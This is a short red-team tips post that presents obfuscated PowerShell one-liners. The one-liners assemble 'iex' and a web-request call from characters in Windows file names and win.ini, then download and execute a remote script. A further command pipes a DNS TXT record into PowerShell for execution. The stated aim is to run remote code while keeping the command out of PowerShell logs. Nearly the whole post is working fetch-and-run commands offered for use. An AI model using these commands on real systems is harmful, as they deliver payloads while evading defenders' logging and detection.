Red Team Tips: Powershell Invoke Expression (iex)

Inspired by the recent nslookup bypass you can do with PowerShell I invested some time to see if using the Windows filesystem to do a similar thing.

Here is what I have so far, when I hosted a ps1 script that simply had notepad in it, it popped up:

$x=(ls C:\Windows\System32\drivers\etc);$x=$x.name;$x=$x[0]+$x[1]+$x[2]+$x[3]+$x[4]+$x[5];$y=(gc C:\Windows\win.ini);$y=$y[2];$x[33]+$x[1]+$x[28]+$x[26]+$x[34]+$x[4]+$x[0]+$x[26]+$x[40]+$x[40] ($y[7]+$y[1]+$y[2]+"(" +$y[7]+$x[28]+$x[34]+" http://127.0.0.1/1.ps1)"))

Never mind, after reviewing the event viewer and PowerShell logs, it shows the command as if I’d typed it.

I figured out you can also use PowerShell to execute commands similar to the nslookup method:

& powershell (Resolve-DnsName -Name zsecure.uk -Type txt)[-1].Strings

I did something different to the top script, and it logs PowerShell but not the command. I think I have found a bypass. I was wrong before, so I am probably wrong now.

$x=[string]::join("",((ls C:\Windows\System32\drivers\etc).Name.Split("`n")));$y=(gc C:\Windows\win.ini);$y=$y[2];($y[7]+$y[1]+$y[2]+"(" +$y[7]+$x[28]+$x[34]+" http://127.0.0.1/1.ps1)") | powershell

Less characters

$x=[string]::join("",((ls C:\Windows\System32\drivers\etc).Name.Split("`n")));$y=(gc C:\Windows\win.ini)[2];($y[7]+$y[1]+$y[2]+"(" +$y[7]+$x[28]+$x[34]+" http://127.0.0.1/1.ps1)")|powershell